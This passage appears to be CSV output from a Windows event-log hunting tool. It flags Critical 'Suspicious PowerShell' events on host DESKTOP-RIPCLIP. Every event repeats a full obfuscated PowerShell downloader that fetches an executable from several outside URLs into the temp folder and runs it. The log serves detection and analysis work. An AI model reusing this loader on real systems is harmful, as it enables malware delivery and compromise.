neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=27 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item" +ParameterBinding(Get-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 787 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=23 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object" +ParameterBinding(New-Object): name="TypeName"; value="neT.WEbcLiENt" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 792 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=33 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item" +ParameterBinding(Invoke-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 786 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=21 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', 